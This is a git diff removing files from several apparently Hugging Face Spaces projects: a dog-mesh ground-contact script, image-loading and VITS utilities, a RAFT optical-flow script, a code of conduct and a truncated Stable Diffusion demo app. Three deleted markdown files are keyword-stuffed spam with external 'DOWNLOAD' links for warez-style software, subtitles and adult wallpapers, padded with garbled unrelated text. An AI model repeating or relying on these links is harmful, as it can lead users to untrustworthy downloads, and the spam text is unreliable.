my_mesh.visual.vertex_colors = vert_colors - my_mesh.export(root_out_path_vis + (name).replace('.jpg', '_withgc.obj')) - img_path = img_v12_dir + name - shutil.copy(img_path, root_out_path_vis + name) - # calculate for each vertex the distance to the closest element of the other group - non_gc_vertices = list(set(range(n_verts_smal)) - set(gc_vertices)) - print('vertices in contact: ' + str(len(gc_vertices))) - print('vertices without contact: ' + str(len(non_gc_vertices))) - vertex_overview = np.zeros((n_verts_smal, 3)) # first: no-contact=0 contact=1 second: index of vertex third: dist - vertex_overview[:, 0] = gc_info_np - # loop through all contact vertices - for ind_v in gc_vertices: - min_length = 100 - for ind_v_ps in non_gc_vertices: # possible solution - # this_path = nx.shortest_path(ga, source=ind_v, target=ind_v_ps, weight='length') - # this_length = nx.shortest_path_length(ga, source=ind_v, target=ind_v_ps, weight='length') - this_length = vert_dists[ind_v, ind_v_ps] - if this_length < min_length: - min_length = this_length - vertex_overview[ind_v, 1] = ind_v_ps - vertex_overview[ind_v, 2] = this_length - # loop through all non-contact vertices - for ind_v in non_gc_vertices: - min_length = 100 - for ind_v_ps in gc_vertices: # possible solution - # this_path = nx.shortest_path(ga, source=ind_v, target=ind_v_ps, weight='length') - # this_length = nx.shortest_path_length(ga, source=ind_v, target=ind_v_ps, weight='length') - this_length = vert_dists[ind_v, ind_v_ps] - if this_length < min_length: - min_length = this_length - vertex_overview[ind_v, 1] = ind_v_ps - vertex_overview[ind_v, 2] = this_length - if root_out_path_vis is not None: - # save a colored mesh - my_mesh_dists = my_mesh.copy() - scale_0 = (vertex_overview[vertex_overview[:, 0]==0, 2]).max() - scale_1 = (vertex_overview[vertex_overview[:, 0]==1, 2]).max() - vert_col = np.zeros((n_verts_smal, 3)) - vert_col[vertex_overview[:, 0]==0, 1] = vertex_overview[vertex_overview[:, 0]==0, 2] * 255 / scale_0 # green - vert_col[vertex_overview[:, 0]==1, 0] = vertex_overview[vertex_overview[:, 0]==1, 2] * 255 / scale_1 # red - my_mesh_dists.visual.vertex_colors = np.uint8(vert_col) - my_mesh_dists.export(root_out_path_vis + (name).replace('.jpg', '_withgcdists.obj')) - return vertex_overview - - - - - - - - - -def main(): - - ROOT_PATH_MESH = '/is/cluster/work/nrueegg/icon_pifu_related/barc_for_bite/src/graph_networks/graphcmr/data/meshes/' - IMG_V12_DIR = '/ps/scratch/nrueegg/new_projects/Animals/data/dog_datasets/Stanford_Dogs_Dataset/StanfordExtra_V12/StanExtV12_Images/' - # ROOT_OUT_PATH = '/is/cluster/work/nrueegg/icon_pifu_related/barc_for_bite/src/graph_networks/losses_for_vertex_wise_predictions/debugging_results/' - ROOT_OUT_PATH = '/is/cluster/work/nrueegg/icon_pifu_related/barc_for_bite/data/stanext_related_data/ground_contact_annotations/stages12together/' - ROOT_PATH_ALL_VERT_DIST_TEMPLATE = '/is/cluster/work/nrueegg/icon_pifu_related/barc_for_bite/data/stanext_related_data/ground_contact_annotations/' - - # load all vertex distances - path_mesh = ROOT_PATH_MESH + 'mesh_downsampling_meshesmy_smpl_39dogsnorm_Jr_4_dog_template_downsampled0.obj' - my_mesh = trimesh.load_mesh(path_mesh, process=False, maintain_order=True) - verts = my_mesh.vertices - faces = my_mesh.faces - # vert_dists, ga = prepare_graph_from_template_mesh_and_calculate_all_distances(path_mesh, ROOT_OUT_PATH, calc_dist_mat=False) - vert_dists = load_all_template_mesh_distances(ROOT_PATH_ALL_VERT_DIST_TEMPLATE, filename='all_vertex_distances.npy') - - 
# paw vertices: - # left and right is a bit different, but that is ok (we will anyways mirror data at training time) - right_front_paw = [3829,+3827,+3825,+3718,+3722,+3723,+3743,+3831,+3719,+3726,+3716,+3724,+3828,+3717,+3721,+3725,+3832,+3830,+3720,+3288,+3740,+3714,+3826,+3715,+3728,+3712,+3287,+3284,+3727,+3285,+3742,+3291,+3710,+3697,+3711,+3289,+3730,+3713,+3739,+3282,+3738,+3708,+3709,+3741,+3698,+3696,+3308,+3695,+3706,+3700,+3707,+3306,+3305,+3737,+3304,+3303,+3307,+3736,+3735,+3250,+3261,+3732,+3734,+3733,+3731,+3729,+3299,+3297,+3298,+3295,+3293,+3296,+3294,+3292,+3312,+3311,+3314,+3309,+3290,+3313,+3410,+3315,+3411,+3412,+3316,+3421,+3317,+3415,+3445,+3327,+3328,+3283,+3343,+3326,+3325,+3330,+3286,+3399,+3398,+3329,+3446,+3400,+3331,+3401,+3281,+3332,+3279,+3402,+3419,+3407,+3356,+3358,+3357,+3280,+3354,+3277,+3278,+3346,+3347,+3377,+3378,+3345,+3386,+3379,+3348,+3384,+3418,+3372,+3276,+3275,+3374,+3274,+3373,+3375,+3369,+3371,+3376,+3273,+3396,+3397,+3395,+3388,+3360,+3370,+3361,+3394,+3387,+3420,+3359,+3389,+3272,+3391,+3393,+3390,+3392,+3363,+3362,+3367,+3365,+3705,+3271,+3704,+3703,+3270,+3269,+3702,+3268,+3224,+3267,+3701,+3225,+3699,+3265,+3264,+3266,+3263,+3262,+3249,+3228,+3230,+3251,+3301,+3300,+3302,+3252] - right_back_paw = [3472,+3627,+3470,+3469,+3471,+3473,+3626,+3625,+3475,+3655,+3519,+3468,+3629,+3466,+3476,+3624,+3521,+3654,+3657,+3838,+3518,+3653,+3839,+3553,+3474,+3516,+3656,+3628,+3834,+3535,+3630,+3658,+3477,+3520,+3517,+3595,+3522,+3597,+3596,+3501,+3534,+3503,+3478,+3500,+3479,+3502,+3607,+3499,+3608,+3496,+3605,+3609,+3504,+3606,+3642,+3614,+3498,+3480,+3631,+3610,+3613,+3506,+3659,+3660,+3632,+3841,+3661,+3836,+3662,+3633,+3663,+3664,+3634,+3635,+3486,+3665,+3636,+3637,+3666,+3490,+3837,+3667,+3493,+3638,+3492,+3495,+3616,+3644,+3494,+3835,+3643,+3833,+3840,+3615,+3650,+3668,+3652,+3651,+3645,+3646,+3647,+3649,+3648,+3622,+3617,+3448,+3621,+3618,+3623,+3462,+3464,+3460,+3620,+3458,+3461,+3463,+3465,+3573,+3571,+3467,+3569,+3557,+3558,+3572,+3570,+3556,+3585,+3593,+3594,+3459,+3566,+3592,+3567,+3568,+3538,+3539,+3555,+3537,+3536,+3554,+3575,+3574,+3583,+3541,+3550,+3576,+3581,+3639,+3577,+3551,+3582,+3580,+3552,+3578,+3542,+3549,+3579,+3523,+3526,+3598,+3525,+3600,+3640,+3599,+3601,+3602,+3603,+3529,+3604,+3530,+3533,+3532,+3611,+3612,+3482,+3481,+3505,+3452,+3455,+3456,+3454,+3457,+3619,+3451,+3450,+3449,+3591,+3589,+3641,+3584,+3561,+3587,+3559,+3488,+3484,+3483] - left_front_paw = 
[1791,+1950,+1948,+1790,+1789,+1746,+1788,+1747,+1949,+1944,+1792,+1945,+1356,+1775,+1759,+1777,+1787,+1946,+1757,+1761,+1745,+1943,+1947,+1744,+1309,+1786,+1771,+1354,+1774,+1765,+1767,+1768,+1772,+1763,+1770,+1773,+1769,+1764,+1766,+1758,+1760,+1762,+1336,+1333,+1330,+1325,+1756,+1323,+1755,+1753,+1749,+1754,+1751,+1321,+1752,+1748,+1750,+1312,+1319,+1315,+1313,+1317,+1318,+1316,+1314,+1311,+1310,+1299,+1276,+1355,+1297,+1353,+1298,+1300,+1352,+1351,+1785,+1784,+1349,+1783,+1782,+1781,+1780,+1779,+1778,+1776,+1343,+1341,+1344,+1339,+1342,+1340,+1360,+1335,+1338,+1362,+1357,+1361,+1363,+1458,+1337,+1459,+1456,+1460,+1493,+1332,+1375,+1376,+1331,+1374,+1378,+1334,+1373,+1494,+1377,+1446,+1448,+1379,+1449,+1329,+1327,+1404,+1406,+1405,+1402,+1328,+1426,+1432,+1434,+1403,+1394,+1395,+1433,+1425,+1286,+1380,+1466,+1431,+1290,+1401,+1381,+1427,+1450,+1393,+1430,+1326,+1396,+1428,+1397,+1429,+1398,+1420,+1324,+1422,+1417,+1419,+1421,+1443,+1418,+1423,+1444,+1442,+1424,+1445,+1495,+1440,+1441,+1468,+1436,+1408,+1322,+1435,+1415,+1439,+1409,+1283,+1438,+1416,+1407,+1437,+1411,+1413,+1414,+1320,+1273,+1272,+1278,+1469,+1463,+1457,+1358,+1464,+1465,+1359,+1372,+1391,+1390,+1455,+1447,+1454,+1467,+1453,+1452,+1451,+1383,+1345,+1347,+1348,+1350,+1364,+1392,+1410,+1412] - left_back_paw = [1957,+1958,+1701,+1956,+1951,+1703,+1715,+1702,+1700,+1673,+1705,+1952,+1955,+1674,+1699,+1675,+1953,+1704,+1954,+1698,+1677,+1671,+1672,+1714,+1706,+1676,+1519,+1523,+1686,+1713,+1692,+1685,+1543,+1664,+1712,+1691,+1959,+1541,+1684,+1542,+1496,+1663,+1540,+1497,+1499,+1498,+1500,+1693,+1665,+1694,+1716,+1666,+1695,+1501,+1502,+1696,+1667,+1503,+1697,+1504,+1668,+1669,+1506,+1670,+1508,+1510,+1507,+1509,+1511,+1512,+1621,+1606,+1619,+1605,+1513,+1620,+1618,+1604,+1633,+1641,+1642,+1607,+1617,+1514,+1632,+1614,+1689,+1640,+1515,+1586,+1616,+1516,+1517,+1603,+1615,+1639,+1585,+1521,+1602,+1587,+1584,+1601,+1623,+1622,+1631,+1598,+1624,+1629,+1589,+1687,+1625,+1599,+1630,+1569,+1570,+1628,+1626,+1597,+1627,+1590,+1594,+1571,+1568,+1567,+1574,+1646,+1573,+1645,+1648,+1564,+1688,+1647,+1643,+1649,+1650,+1651,+1577,+1644,+1565,+1652,+1566,+1578,+1518,+1524,+1583,+1582,+1520,+1581,+1522,+1525,+1549,+1551,+1580,+1552,+1550,+1656,+1658,+1554,+1657,+1659,+1548,+1655,+1690,+1660,+1556,+1653,+1558,+1661,+1544,+1662,+1654,+1547,+1545,+1527,+1560,+1526,+1678,+1679,+1528,+1708,+1707,+1680,+1529,+1530,+1709,+1546,+1681,+1710,+1711,+1682,+1532,+1531,+1683,+1534,+1533,+1536,+1538,+1600,+1553] - - - all_contact_vertices = right_front_paw + right_back_paw + left_front_paw + left_back_paw - - name = 'all4pawsincontact.jpg' - print('work on 4paw images') - gc_info_raw = all_contact_vertices # a list with all vertex numbers that are in ground contact - - vertex_overview = calculate_vertex_overview_for_gc_annotation(name, gc_info_raw, vert_dists, root_out_path_vis=ROOT_OUT_PATH, verts=verts, faces=faces, img_v12_dir=None) - np.save(ROOT_OUT_PATH + name.replace('.jpg', '_gc_vertdists_overview.npy'), vertex_overview) - - vertex_overview_dict = {} - vertex_overview_dict[name.split('.')[0]] = {'gc_vertdists_overview': vertex_overview, 'gc_index_list': gc_info_raw} - with open(ROOT_OUT_PATH + 'gc_annots_overview_all4pawsincontact_xx.pkl', 'wb') as fp: - pkl.dump(vertex_overview_dict, fp) - - - - - - - - - - - -if __name__ == "__main__": - main() - - - - - - - diff --git a/spaces/rycont/Biblify/README.md b/spaces/rycont/Biblify/README.md deleted file mode 100644 index 
ad81305b2e49432a9d1485f9cd01c794d66aab0e..0000000000000000000000000000000000000000 --- a/spaces/rycont/Biblify/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Biblify -emoji: 🌍 -colorFrom: blue -colorTo: green -sdk: streamlit -sdk_version: 1.21.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/safi842/FashionGen/netdissect/parallelfolder.py b/spaces/safi842/FashionGen/netdissect/parallelfolder.py deleted file mode 100644 index a741691569a7c85e96d3b3d9be12b40d508f0044..0000000000000000000000000000000000000000 --- a/spaces/safi842/FashionGen/netdissect/parallelfolder.py +++ /dev/null @@ -1,118 +0,0 @@ -''' -Variants of pytorch's ImageFolder for loading image datasets with more -information, such as parallel feature channels in separate files, -cached files with lists of filenames, etc. -''' - -import os, torch, re -import torch.utils.data as data -from torchvision.datasets.folder import default_loader -from PIL import Image -from collections import OrderedDict -from .progress import default_progress - -def grayscale_loader(path): - with open(path, 'rb') as f: - return Image.open(f).convert('L') - -class ParallelImageFolders(data.Dataset): - """ - A data loader that looks for parallel image filenames, for example - - photo1/park/004234.jpg - photo1/park/004236.jpg - photo1/park/004237.jpg - - photo2/park/004234.png - photo2/park/004236.png - photo2/park/004237.png - """ - def __init__(self, image_roots, - transform=None, - loader=default_loader, - stacker=None, - intersection=False, - verbose=None, - size=None): - self.image_roots = image_roots - self.images = make_parallel_dataset(image_roots, - intersection=intersection, verbose=verbose) - if len(self.images) == 0: - raise RuntimeError("Found 0 images within: %s" % image_roots) - if size is not None: - self.image = self.images[:size] - if transform is not None and not hasattr(transform, '__iter__'): - transform = [transform for _ in image_roots] - self.transforms = transform - self.stacker = stacker - self.loader = loader - - def __getitem__(self, index): - paths = self.images[index] - sources = [self.loader(path) for path in paths] - # Add a common shared state dict to allow random crops/flips to be - # coordinated. 
- shared_state = {} - for s in sources: - s.shared_state = shared_state - if self.transforms is not None: - sources = [transform(source) - for source, transform in zip(sources, self.transforms)] - if self.stacker is not None: - sources = self.stacker(sources) - else: - sources = tuple(sources) - return sources - - def __len__(self): - return len(self.images) - -def is_npy_file(path): - return path.endswith('.npy') or path.endswith('.NPY') - -def is_image_file(path): - return None != re.search(r'\.(jpe?g|png)$', path, re.IGNORECASE) - -def walk_image_files(rootdir, verbose=None): - progress = default_progress(verbose) - indexfile = '%s.txt' % rootdir - if os.path.isfile(indexfile): - basedir = os.path.dirname(rootdir) - with open(indexfile) as f: - result = sorted([os.path.join(basedir, line.strip()) - for line in progress(f.readlines(), - desc='Reading %s' % os.path.basename(indexfile))]) - return result - result = [] - for dirname, _, fnames in sorted(progress(os.walk(rootdir), - desc='Walking %s' % os.path.basename(rootdir))): - for fname in sorted(fnames): - if is_image_file(fname) or is_npy_file(fname): - result.append(os.path.join(dirname, fname)) - return result - -def make_parallel_dataset(image_roots, intersection=False, verbose=None): - """ - Returns [(img1, img2), (img1, img2)..] - """ - image_roots = [os.path.expanduser(d) for d in image_roots] - image_sets = OrderedDict() - for j, root in enumerate(image_roots): - for path in walk_image_files(root, verbose=verbose): - key = os.path.splitext(os.path.relpath(path, root))[0] - if key not in image_sets: - image_sets[key] = [] - if not intersection and len(image_sets[key]) != j: - raise RuntimeError( - 'Images not parallel: %s missing from one dir' % (key)) - image_sets[key].append(path) - tuples = [] - for key, value in image_sets.items(): - if len(value) != len(image_roots): - if intersection: - continue - else: - raise RuntimeError( - 'Images not parallel: %s missing from one dir' % (key)) - tuples.append(tuple(value)) - return tuples diff --git a/spaces/sai22/vits-models/commons.py b/spaces/sai22/vits-models/commons.py deleted file mode 100644 index 40fcc05364d4815971f5c6f9dbb8dcef8e3ec1e9..0000000000000000000000000000000000000000 --- a/spaces/sai22/vits-models/commons.py +++ /dev/null @@ -1,172 +0,0 @@ -import math -import torch -from torch.nn import functional as F -import torch.jit - - -def script_method(fn, _rcb=None): - return fn - - -def script(obj, optimize=True, _frames_up=0, _rcb=None): - return obj - - -torch.jit.script_method = script_method -torch.jit.script = script - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def intersperse(lst, item): - result = [item] * (len(lst) * 2 + 1) - result[1::2] = lst - return result - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += 0.5 * (torch.exp(2. * logs_p) + ((m_p - m_q)**2)) * torch.exp(-2. 
* logs_q) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d( - length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = ( - math.log(float(max_timescale) / float(min_timescale)) / - (num_timescales - 1)) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2,3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): 
- parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1. / norm_type) - return total_norm diff --git a/spaces/scedlatioru/img-to-music/example/Hd 2014 Led Software Download TOP.md b/spaces/scedlatioru/img-to-music/example/Hd 2014 Led Software Download TOP.md deleted file mode 100644 index 8ccc1edd56184105ee19cacfcbc12bbbed1e39d0..0000000000000000000000000000000000000000 --- a/spaces/scedlatioru/img-to-music/example/Hd 2014 Led Software Download TOP.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Hd 2014 Led Software Download


DOWNLOAD https://gohhs.com/2uEyK5



        -
        -Apache Drill is an open source distributed software framework for interactive analysis. ... A group of contributors led by Ted Dunning of MapR proposed to develop an open ... Drill graduated to top-level project status in December 2014. ... Prospective users can download and install Drill directly from the project web site; ... 1fdad05405
        -
        -
        -

        diff --git a/spaces/scedlatioru/img-to-music/example/Pink Movie English Sub [WORK] Download.md b/spaces/scedlatioru/img-to-music/example/Pink Movie English Sub [WORK] Download.md deleted file mode 100644 index bbc402ee1dde39cd8db0834c4e66b8b9e3873762..0000000000000000000000000000000000000000 --- a/spaces/scedlatioru/img-to-music/example/Pink Movie English Sub [WORK] Download.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Pink Movie English Sub Download


        Download File ✵✵✵ https://gohhs.com/2uEA4t



        - -Pink Floyd - Another Brick in the Wall subtitle, synchronized lyrics and ... You can also download subtitles for your movies or TV series automatically with the ... 1fdad05405
        -
        -
        -

        diff --git a/spaces/scedlatioru/img-to-music/example/VirtuaGirl 2.541 (sexy Video Wallpapers On Desktop) Full Version 2021.md b/spaces/scedlatioru/img-to-music/example/VirtuaGirl 2.541 (sexy Video Wallpapers On Desktop) Full Version 2021.md deleted file mode 100644 index 6bf62df13b0879ba1f7a4af548a085f3d6d55ae4..0000000000000000000000000000000000000000 --- a/spaces/scedlatioru/img-to-music/example/VirtuaGirl 2.541 (sexy Video Wallpapers On Desktop) Full Version 2021.md +++ /dev/null @@ -1,6 +0,0 @@ -

        VirtuaGirl 2.541 (sexy video wallpapers on desktop) full version


        Download ……… https://gohhs.com/2uEzQy



        - -Tennis World Tour est disponible sur PS4, Xbox One, PC et Nintendo Switch.. S'agirait-il ... VirtuaGirl 2.541 (sexy Video Wallpapers On Desktop) Download Pcl ... Crazy Little Thing Called Love Thai Movie Torrent 36l 4d29de3e1b
        -
        -
        -

        diff --git a/spaces/sczhou/ProPainter/scripts/compute_flow.py b/spaces/sczhou/ProPainter/scripts/compute_flow.py deleted file mode 100644 index 8596e4dc95c1969826adaf9c72a076584886ece2..0000000000000000000000000000000000000000 --- a/spaces/sczhou/ProPainter/scripts/compute_flow.py +++ /dev/null @@ -1,108 +0,0 @@ -# -*- coding: utf-8 -*- -import sys -sys.path.append(".") - -import os -import cv2 -import argparse -from PIL import Image -import torch -import torch.nn.functional as F -from torchvision import transforms - -from RAFT import RAFT -from utils.flow_util import * - -def imwrite(img, file_path, params=None, auto_mkdir=True): - if auto_mkdir: - dir_name = os.path.abspath(os.path.dirname(file_path)) - os.makedirs(dir_name, exist_ok=True) - return cv2.imwrite(file_path, img, params) - -def initialize_RAFT(model_path='weights/raft-things.pth', device='cuda'): - """Initializes the RAFT model. - """ - args = argparse.ArgumentParser() - args.raft_model = model_path - args.small = False - args.mixed_precision = False - args.alternate_corr = False - - model = torch.nn.DataParallel(RAFT(args)) - model.load_state_dict(torch.load(args.raft_model)) - - model = model.module - model.to(device) - model.eval() - - return model - - -if __name__ == '__main__': - device = 'cuda' - - parser = argparse.ArgumentParser() - parser.add_argument('-i', '--root_path', type=str, default='your_dataset_root/youtube-vos/JPEGImages') - parser.add_argument('-o', '--save_path', type=str, default='your_dataset_root/youtube-vos/Flows_flo') - parser.add_argument('--height', type=int, default=240) - parser.add_argument('--width', type=int, default=432) - - args = parser.parse_args() - - # Flow model - RAFT_model = initialize_RAFT(device=device) - - root_path = args.root_path - save_path = args.save_path - h_new, w_new = (args.height, args.width) - - file_list = sorted(os.listdir(root_path)) - for f in file_list: - print(f'Processing: {f} ...') - m_list = sorted(os.listdir(os.path.join(root_path, f))) - len_m = len(m_list) - for i in range(len_m-1): - img1_path = os.path.join(root_path, f, m_list[i]) - img2_path = os.path.join(root_path, f, m_list[i+1]) - img1 = Image.fromarray(cv2.imread(img1_path)) - img2 = Image.fromarray(cv2.imread(img2_path)) - - transform = transforms.Compose([transforms.ToTensor()]) - - img1 = transform(img1).unsqueeze(0).to(device)[:,[2,1,0],:,:] - img2 = transform(img2).unsqueeze(0).to(device)[:,[2,1,0],:,:] - - # upsize to a multiple of 16 - # h, w = img1.shape[2:4] - # w_new = w if (w % 16) == 0 else 16 * (w // 16 + 1) - # h_new = h if (h % 16) == 0 else 16 * (h // 16 + 1) - - - img1 = F.interpolate(input=img1, - size=(h_new, w_new), - mode='bilinear', - align_corners=False) - img2 = F.interpolate(input=img2, - size=(h_new, w_new), - mode='bilinear', - align_corners=False) - - with torch.no_grad(): - img1 = img1*2 - 1 - img2 = img2*2 - 1 - - _, flow_f = RAFT_model(img1, img2, iters=20, test_mode=True) - _, flow_b = RAFT_model(img2, img1, iters=20, test_mode=True) - - - flow_f = flow_f[0].permute(1,2,0).cpu().numpy() - flow_b = flow_b[0].permute(1,2,0).cpu().numpy() - - # flow_f = resize_flow(flow_f, w_new, h_new) - # flow_b = resize_flow(flow_b, w_new, h_new) - - save_flow_f = os.path.join(save_path, f, f'{m_list[i][:-4]}_{m_list[i+1][:-4]}_f.flo') - save_flow_b = os.path.join(save_path, f, f'{m_list[i+1][:-4]}_{m_list[i][:-4]}_b.flo') - - flowwrite(flow_f, save_flow_f, quantize=False) - flowwrite(flow_b, save_flow_b, quantize=False) diff --git 
a/spaces/segments/panoptic-segment-anything/segment_anything/CODE_OF_CONDUCT.md b/spaces/segments/panoptic-segment-anything/segment_anything/CODE_OF_CONDUCT.md deleted file mode 100644 index 08b500a221857ec3f451338e80b4a9ab1173a1af..0000000000000000000000000000000000000000 --- a/spaces/segments/panoptic-segment-anything/segment_anything/CODE_OF_CONDUCT.md +++ /dev/null @@ -1,80 +0,0 @@ -# Code of Conduct - -## Our Pledge - -In the interest of fostering an open and welcoming environment, we as -contributors and maintainers pledge to make participation in our project and -our community a harassment-free experience for everyone, regardless of age, body -size, disability, ethnicity, sex characteristics, gender identity and expression, -level of experience, education, socio-economic status, nationality, personal -appearance, race, religion, or sexual identity and orientation. - -## Our Standards - -Examples of behavior that contributes to creating a positive environment -include: - -* Using welcoming and inclusive language -* Being respectful of differing viewpoints and experiences -* Gracefully accepting constructive criticism -* Focusing on what is best for the community -* Showing empathy towards other community members - -Examples of unacceptable behavior by participants include: - -* The use of sexualized language or imagery and unwelcome sexual attention or - advances -* Trolling, insulting/derogatory comments, and personal or political attacks -* Public or private harassment -* Publishing others' private information, such as a physical or electronic - address, without explicit permission -* Other conduct which could reasonably be considered inappropriate in a - professional setting - -## Our Responsibilities - -Project maintainers are responsible for clarifying the standards of acceptable -behavior and are expected to take appropriate and fair corrective action in -response to any instances of unacceptable behavior. - -Project maintainers have the right and responsibility to remove, edit, or -reject comments, commits, code, wiki edits, issues, and other contributions -that are not aligned to this Code of Conduct, or to ban temporarily or -permanently any contributor for other behaviors that they deem inappropriate, -threatening, offensive, or harmful. - -## Scope - -This Code of Conduct applies within all project spaces, and it also applies when -an individual is representing the project or its community in public spaces. -Examples of representing a project or community include using an official -project e-mail address, posting via an official social media account, or acting -as an appointed representative at an online or offline event. Representation of -a project may be further defined and clarified by project maintainers. - -This Code of Conduct also applies outside the project spaces when there is a -reasonable belief that an individual's behavior may have a negative impact on -the project or its community. - -## Enforcement - -Instances of abusive, harassing, or otherwise unacceptable behavior may be -reported by contacting the project team at . All -complaints will be reviewed and investigated and will result in a response that -is deemed necessary and appropriate to the circumstances. The project team is -obligated to maintain confidentiality with regard to the reporter of an incident. -Further details of specific enforcement policies may be posted separately. 
- -Project maintainers who do not follow or enforce the Code of Conduct in good -faith may face temporary or permanent repercussions as determined by other -members of the project's leadership. - -## Attribution - -This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, -available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html - -[homepage]: https://www.contributor-covenant.org - -For answers to common questions about this code of conduct, see -https://www.contributor-covenant.org/faq diff --git a/spaces/segmind/Segmind-Stable-Diffusion/app.py b/spaces/segmind/Segmind-Stable-Diffusion/app.py deleted file mode 100644 index ba5869acbb7318ba058a9aa88fb8776be47b8c9e..0000000000000000000000000000000000000000 --- a/spaces/segmind/Segmind-Stable-Diffusion/app.py +++ /dev/null @@ -1,385 +0,0 @@ -#!/usr/bin/env python - -from __future__ import annotations - -import os -import random - -import gradio as gr -import numpy as np -import PIL.Image -import torch -from diffusers import AutoencoderKL, StableDiffusionXLPipeline -import uuid - -DESCRIPTION = '''# Segmind Stable Diffusion: SSD-1B -#### [Segmind's SSD-1B](https://huggingface.co/segmind/SSD-1B) is a distilled, 50% smaller version of SDXL, offering up to 60% speedup -''' -if not torch.cuda.is_available(): - DESCRIPTION += "\n

<p>Running on CPU 🥶 This demo does not work on CPU.</p>
        " - -MAX_SEED = np.iinfo(np.int32).max -CACHE_EXAMPLES = torch.cuda.is_available() and os.getenv("CACHE_EXAMPLES", "1") == "1" -MAX_IMAGE_SIZE = int(os.getenv("MAX_IMAGE_SIZE", "1024")) -USE_TORCH_COMPILE = os.getenv("USE_TORCH_COMPILE", "1") == "1" -ENABLE_CPU_OFFLOAD = os.getenv("ENABLE_CPU_OFFLOAD", "0") == "1" -ENABLE_REFINER = os.getenv("ENABLE_REFINER", "0") == "1" - -device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") - -style_list = [ - { - "name": "(No style)", - "prompt": "{prompt}", - "negative_prompt": "", - }, - { - "name": "Cinematic", - "prompt": "cinematic still {prompt} . emotional, harmonious, vignette, highly detailed, high budget, bokeh, cinemascope, moody, epic, gorgeous, film grain, grainy", - "negative_prompt": "anime, cartoon, graphic, text, painting, crayon, graphite, abstract, glitch, deformed, mutated, ugly, disfigured", - }, - { - "name": "Photographic", - "prompt": "cinematic photo {prompt} . 35mm photograph, film, bokeh, professional, 4k, highly detailed", - "negative_prompt": "drawing, painting, crayon, sketch, graphite, impressionist, noisy, blurry, soft, deformed, ugly", - }, - { - "name": "Anime", - "prompt": "anime artwork {prompt} . anime style, key visual, vibrant, studio anime, highly detailed", - "negative_prompt": "photo, deformed, black and white, realism, disfigured, low contrast", - }, - { - "name": "Manga", - "prompt": "manga style {prompt} . vibrant, high-energy, 